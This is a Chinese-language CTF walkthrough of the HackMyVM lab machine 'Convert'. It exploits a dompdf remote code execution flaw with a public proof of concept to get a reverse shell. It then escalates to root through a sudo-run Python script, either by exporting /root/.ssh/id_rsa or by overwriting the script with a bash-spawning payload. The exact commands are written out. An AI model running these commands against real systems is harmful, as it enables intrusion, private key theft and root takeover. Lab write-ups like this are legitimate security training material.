HackMyVM-Convert
简介
难度:简单
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Convert

环境
- 攻击机 kali:192.168.18.49
- 靶机:VBOX:192.168.18.51
信息搜集
端口扫描:22和80端口

访问80端口,可以将html网页转换成pdf,保存到/upload目录下


将pdf导出后,用exiftool查看,发现dompdf

网上搜索html转pdf漏洞,也可以搜到这个dompdf漏洞的原理

漏洞利用
这里有个直接打包好的poc:
https://github.com/Tw0-Y/THM.git
直接攻击就行了,开个监听,成功弹回shell
python3 dompdf-rce.py --inject http://192.168.18.51/index.php?url= --dompdf http://192.168.18.51/dompdf

提权
sudo -l看一下,发现有可以直接用sudo -l 执行的python文件

cat一下这个文件,脚本就是将html转换为pdf,这里开始有两种思路:
思路一
将/root目录下的私钥文件转换成pdf,然后用wget下载下来查看,最后用私钥文件直接去ssh连接root
sudo /usr/bin/python3 /home/eva/pdfgen.py -U /root/.ssh/id_rsa -O /var/www/html/1.pdf
思路二
我们发现可以直接创建一个1.python文件,里面是执行bash的命令,然后改名直接覆盖pdfgen.py这个文件
eva@convert:~$ echo 'import os;os.system("/bin/bash")' > 1.py
echo 'import os;os.system("/bin/bash")' > 1.py
eva@convert:~$ ls
ls
1.py
pdf_gen.log
pdfgen.py
user.txt
eva@convert:~$ mv 1.py pdfgen.py
mv 1.py pdfgen.py
eva@convert:~$ ls
ls
pdf_gen.log
pdfgen.py
user.txt
eva@convert:~$ cat pdfgen.py
cat pdfgen.py
import os;os.system("/bin/bash")
最后直接sudo执行新的pdfgen.py这个文件,拿到root


浙公网安备 33010602011771号